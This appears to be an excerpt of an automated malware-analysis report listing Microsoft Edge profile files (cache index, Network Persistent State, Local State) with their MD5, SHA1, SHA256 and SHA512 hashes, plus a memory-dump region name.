SHA512 f0232a613543bd4dc78ec58b5fd225e2296a7df390245f1bd3bc1f3bd4c1b08d9f595080ce5b0a24154de8eca0b22612b346e3fd801969c68c26b517333e03da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5cbe9aab70f9f66bfbf00ff97a9aafaf
SHA1 f4639e7702e21d3ca8531d42b56b9b47e5875a3a
SHA256 88cc2a07cf5983f044ee9353af09e793aa35d8ab28064bf8e2a3ba277a691d06
SHA512 068cbc26a832f9a37b21322f70085c92d59fd0bac6d5f24087a4d45216108f5dfe495bebfa8b1acc155424e4bcedac8c3f0a0eaf293228e41ff906082ef2a156

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 88adc2e00cc1e97304bbaad33a38d296
SHA1 f26965245c05e08cd1e902039bcd6b316bc11177
SHA256 935cb6354404afd1262d5e75cc911e2cf1a6f8bff605c83818a901f909e0a8dc
SHA512 a67aa4ef0a655b44ce2b249eee0cc9115c2761b911b0b23917ee371e20df5bc3587f55f202c8802facf7027cc2ae5cdeeed76ac8c1e06528d33c8127f6a818a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 06bd1fa2b01c4eb42b21d2bcceabd9a0
SHA1 07acc233215a77c9bfa5db8c6c6597a770d32cb3
SHA256 18c698560a7603c50258592305178586746a2e77123a607c60971317018e7ac0
SHA512 3e4704243d65a158d57d48a6db0bd80ea12ada5cb7bc292e8c2643a9016f47038a3ee32c5abe96afb0667fcc65a517352baa0316c00296674c5e8e9398f3cda4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8fd0e36cdfa9cfc5451623950ac119fa
SHA1 5bd17e1a35081eefe032c0e60b6428048b9cd28d
SHA256 790f66070f531f7a66e5bc6a1ddbf5075265859ae37c824c3552056c87033f1a
SHA512 6c49bb752882b5fea99745eed5ab21e36ed28f57b4bce871420101d5b249874fc3863e5f6309317a43eb4792b327dd2e56c0fe3f5f3d08d2deebd756677d5c87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c664876281666ad7b4ac90ca7cdf8daf
SHA1 209a8a1f411f1da79485c286d5abf6636b59d4fa
SHA256 89aa0449a161435aa15fee250562efe683ff86af866aa5924e160e9829c171b8
SHA512 f50f8294a07ff54df461c2f67e8cfe2492949b6259ff2d3ca971a61334fbc1d0259acce2cfedea02e35ac073b6fda2bb3582df072970fd087fb49a4ea9f0c45e

memory/2068-765-0x0000000002750000-0x00000000027A6000-memory.dmp